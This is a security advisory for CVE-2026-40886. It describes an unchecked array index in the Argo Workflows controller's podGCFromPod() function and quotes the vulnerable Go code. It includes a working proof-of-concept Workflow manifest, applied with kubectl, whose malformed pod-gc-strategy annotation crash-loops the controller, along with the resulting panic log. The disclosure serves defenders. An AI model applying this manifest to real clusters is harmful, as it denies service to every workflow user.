CVE-2026-40886

ADVISORY - github

Summary

Summary

An unchecked array index in the pod informer's podGCFromPod() function causes a controller-wide panic when a workflow pod carries a malformed workflows.argoproj.io/pod-gc-strategy annotation. Because the panic occurs inside an informer goroutine (outside the controller's recover() scope), it crashes the entire controller process. The poisoned pod persists across restarts, causing a crash loop that halts all workflow processing until the pod is manually deleted.

Details

podGCFromPod() splits the annotation value on "/" and unconditionally accesses parts[1]:

func podGCFromPod(pod *apiv1.Pod) wfv1.PodGC {
    if val, ok := pod.Annotations[common.AnnotationKeyPodGCStrategy]; ok {
        parts := strings.Split(val, "/")
        return wfv1.PodGC{Strategy: wfv1.PodGCStrategy(parts[0]), DeleteDelayDuration: parts[1]}
    }
    return wfv1.PodGC{Strategy: wfv1.PodGCOnPodNone}
}

If the annotation value contains no "/", parts has length 1 and parts[1] panics with index out of range.

The code was introduced in #14129 and affects versions:

  • 3.6.x: v3.6.5 through v3.6.19 (backport in #14263)
  • 3.7.x: v3.7.0-rc1 through v3.7.12
  • 4.x: v4.0.0-rc1 through v4.0.3
  • Not affected: v3.6.4 and earlier

PoC

Apply this workflow to a cluster running the Argo Workflows controller:

kubectl apply -n argo -f - <<'EOF'
apiVersion: argoproj.io/v1alpha1
kind: Workflow
metadata:
  name: crash-podgc
spec:
  entrypoint: main
  serviceAccountName: default
  podGC:
    strategy: OnPodCompletion
  podMetadata:
    annotations:
      workflows.argoproj.io/pod-gc-strategy: "NoSlash"
  templates:
    - name: main
      container:
        image: alpine:3.18
        command: [echo, "hello"]
EOF

Within seconds the controller crashes. The controller pod will show CrashLoopBackOff with increasing restart count. Controller logs show:

panic: runtime error: index out of range [1] with length 1

goroutine 291 [running]:
github.com/argoproj/argo-workflows/v4/workflow/controller/pod.podGCFromPod(...)
    /home/runner/work/argo-workflows/argo-workflows/workflow/controller/pod/controller.go:176
github.com/argoproj/argo-workflows/v4/workflow/controller/pod.(*Controller).commonPodEvent(...)
    /home/runner/work/argo-workflows/argo-workflows/workflow/controller/pod/controller.go:197
github.com/argoproj/argo-workflows/v4/workflow/controller/pod.(*Controller).addPodEvent(...)
    /home/runner/work/argo-workflows/argo-workflows/workflow/controller/pod/controller.go:246

Recovery requires deleting the poisoned workflow:

kubectl delete workflow -n argo crash-podgc

Impact

Any user who can submit workflows can crash the Argo Workflows controller and keep it down indefinitely. This is a denial-of-service against all workflows in the cluster. No workflows can make progress while the controller is crash-looping. The attacker needs only create permission on Workflow resources, which is the baseline permission for any Argo Workflows user.

Common Weakness Enumeration (CWE)

ADVISORY - nist

Improper Validation of Array Index

ADVISORY - github

Improper Validation of Array Index


Sign in to Docker Scout

See which of your images are affected by this CVE and how to fix them by signing into Docker Scout.

Sign in